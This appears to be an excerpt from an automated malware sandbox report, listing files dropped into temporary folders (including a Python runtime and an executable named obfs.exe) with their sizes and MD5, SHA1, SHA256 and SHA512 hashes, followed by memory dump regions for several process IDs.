              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\libssl-3.dll

                Filesize

                768KB

                MD5

                19a2aba25456181d5fb572d88ac0e73e

                SHA1

                656ca8cdfc9c3a6379536e2027e93408851483db

                SHA256

                2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006

                SHA512

                df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\obfs.exe

                Filesize

                49.5MB

                MD5

                0ee419c3f7cb101a20ecc1f8b54aa8e4

                SHA1

                586608ab5158b4884e3f4bb9eaf7eea06e03d88d

                SHA256

                d878768d7cd3b23f7b0ad894f83468ef733485156527d6025de7f0a7bd5b8dd9

                SHA512

                8f1de1bece9d82bdd962ce652b154eab38511f66db0378715696d476cb3e19134556a619111380a7ccdd9f26e264990ce558963370e5862d8a863b7e47d3b3b2

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\python312.dll

                Filesize

                6.6MB

                MD5

                3c388ce47c0d9117d2a50b3fa5ac981d

                SHA1

                038484ff7460d03d1d36c23f0de4874cbaea2c48

                SHA256

                c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

                SHA512

                e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\select.pyd

                Filesize

                29KB

                MD5

                92b440ca45447ec33e884752e4c65b07

                SHA1

                5477e21bb511cc33c988140521a4f8c11a427bcc

                SHA256

                680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3

                SHA512

                40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\unicodedata.pyd

                Filesize

                1.1MB

                MD5

                16be9a6f941f1a2cb6b5fca766309b2c

                SHA1

                17b23ae0e6a11d5b8159c748073e36a936f3316a

                SHA256

                10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04

                SHA512

                64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\vcruntime140.dll

                Filesize

                116KB

                MD5

                be8dbe2dc77ebe7f88f910c61aec691a

                SHA1

                a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                SHA256

                4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                SHA512

                0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\vcruntime140_1.dll

                Filesize

                48KB

                MD5

                f8dfa78045620cf8a732e67d1b1eb53d

                SHA1

                ff9a604d8c99405bfdbbf4295825d3fcbc792704

                SHA256

                a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5

                SHA512

                ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

              • C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\zstandard\backend_c.pyd

                Filesize

                513KB

                MD5

                478583eb2f71fa1793829fbde4246bab

                SHA1

                d67331acf14354cfa4cf9ab3a3e0bc2e1288bcf9

                SHA256

                8c7c7929d3a2742f0407619da235d5b298882cc4c7ede3666ac21e9db22f8347

                SHA512

                f4e01565632756036eb38d9663295836b2379b8c4b57de7704a6ee7a24dbcb5a12506ac51d2540991f8fff53ffac1f6fa56814b3a009db6b0cc9f18ab3578fc5

              • C:\Windows\Temp\{7A778DD6-0713-4798-8FC6-569255CAC707}\.ba\SideBar.png

                Filesize

                50KB

                MD5

                888eb713a0095756252058c9727e088a

                SHA1

                c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4

                SHA256

                79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067

                SHA512

                7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0

              • memory/2732-232-0x0000000000B70000-0x0000000001728000-memory.dmp

                Filesize

                11.7MB

              • memory/2732-80-0x0000000000B70000-0x0000000001728000-memory.dmp

                Filesize

                11.7MB

              • memory/2732-82-0x0000000000B70000-0x0000000001728000-memory.dmp

                Filesize

                11.7MB

              • memory/2732-46-0x0000000000B70000-0x0000000001728000-memory.dmp

                Filesize

                11.7MB

              • memory/3800-60-0x00000000731F0000-0x00000000739A0000-memory.dmp

                Filesize

                7.7MB

              • memory/3800-23-0x00000000055D0000-0x0000000005662000-memory.dmp

                Filesize

                584KB

              • memory/3800-24-0x00000000731F0000-0x00000000739A0000-memory.dmp

                Filesize

                7.7MB

              • memory/3800-21-0x0000000000D40000-0x0000000000D7E000-memory.dmp

                Filesize

                248KB

              • memory/4064-442-0x000001BE7CFB0000-0x000001BE7CFC2000-memory.dmp

                Filesize

                72KB

              • memory/4064-443-0x000001BE7CE10000-0x000001BE7CE1A000-memory.dmp

                Filesize

                40KB

              • memory/4344-83-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp

                Filesize

                26.8MB

              • memory/4344-86-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp

                Filesize

                26.8MB

              • memory/4344-87-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp

                Filesize

                26.8MB

              • memory/4344-246-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp

                Filesize

                26.8MB

              • memory/4344-230-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp

                Filesize

                26.8MB

              • memory/4344-465-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp

                Filesize

                26.8MB

              • memory/4436-441-0x00007FF7A6BA0000-0x00007FF7A9DD0000-memory.dmp

                Filesize

                50.2MB

              • memory/4436-233-0x00007FF7A6BA0000-0x00007FF7A9DD0000-memory.dmp

                Filesize

                50.2MB

              • memory/4436-451-0x00007FF7A6BA0000-0x00007FF7A9DD0000-memory.dmp

                Filesize

                50.2MB

              • memory/4512-228-0x0000020CEE900000-0x0000020CEE922000-memory.dmp

                Filesize

                136KB

              • memory/4680-57-0x00000000055E0000-0x0000000005646000-memory.dmp

                Filesize

                408KB

              • memory/4680-64-0x00000000749B0000-0x00000000749FC000-memory.dmp

                Filesize

                304KB

              • memory/4680-62-0x0000000005C60000-0x0000000005CAC000-memory.dmp

                Filesize

                304KB

              • memory/4680-61-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

                Filesize

                120KB

              • memory/4680-122-0x0000000007230000-0x000000000724A000-memory.dmp

                Filesize

                104KB

              • memory/4680-59-0x0000000005820000-0x0000000005B74000-memory.dmp

                Filesize

                3.3MB

              • memory/4680-58-0x0000000005790000-0x00000000057F6000-memory.dmp

                Filesize

                408KB

              • memory/4680-89-0x0000000007140000-0x0000000007154000-memory.dmp

                Filesize

                80KB

              • memory/4680-52-0x0000000005440000-0x0000000005462000-memory.dmp

                Filesize

                136KB

              • memory/4680-151-0x0000000007210000-0x0000000007218000-memory.dmp

                Filesize

                32KB

              • memory/4680-45-0x00000000731F0000-0x00000000739A0000-memory.dmp

                Filesize

                7.7MB

              • memory/4680-25-0x0000000004CA0000-0x00000000052C8000-memory.dmp

                Filesize

                6.2MB

              • memory/4680-26-0x00000000731F0000-0x00000000739A0000-memory.dmp

                Filesize

                7.7MB

              • memory/4680-75-0x0000000006DC0000-0x0000000006E63000-memory.dmp

                Filesize

                652KB

              • memory/4680-22-0x0000000004630000-0x0000000004666000-memory.dmp

                Filesize

                216KB

              • memory/4680-74-0x0000000006D90000-0x0000000006DAE000-memory.dmp

                Filesize

                120KB

              • memory/4680-63-0x0000000006B50000-0x0000000006B82000-memory.dmp

                Filesize

                200KB

              • memory/4680-20-0x00000000731FE000-0x00000000731FF000-memory.dmp

                Filesize

                4KB

              • memory/4680-156-0x00000000731F0000-0x00000000739A0000-memory.dmp

                Filesize

                7.7MB

              • memory/4680-77-0x0000000006EF0000-0x0000000006F0A000-memory.dmp

                Filesize

                104KB

              • memory/4680-76-0x0000000007540000-0x0000000007BBA000-memory.dmp

                Filesize

                6.5MB

              • memory/4680-88-0x0000000007130000-0x000000000713E000-memory.dmp

                Filesize

                56KB

              • memory/4680-81-0x0000000006F70000-0x0000000006F7A000-memory.dmp

                Filesize

                40KB

              • memory/4680-84-0x0000000007170000-0x0000000007206000-memory.dmp

                Filesize

                600KB

              • memory/4680-85-0x00000000070F0000-0x0000000007101000-memory.dmp

                Filesize

                68KB

              • memory/4836-1-0x0000000076FE4000-0x0000000076FE6000-memory.dmp

                Filesize

                8KB

              • memory/4836-3-0x0000000000400000-0x0000000002758000-memory.dmp

                Filesize

                35.3MB

              • memory/4836-2-0x0000000000400000-0x0000000002758000-memory.dmp

                Filesize

                35.3MB

              • memory/4836-43-0x0000000000400000-0x0000000002758000-memory.dmp

                Filesize

                35.3MB

              • memory/4836-0-0x0000000000400000-0x0000000002758000-memory.dmp

                Filesize

                35.3MB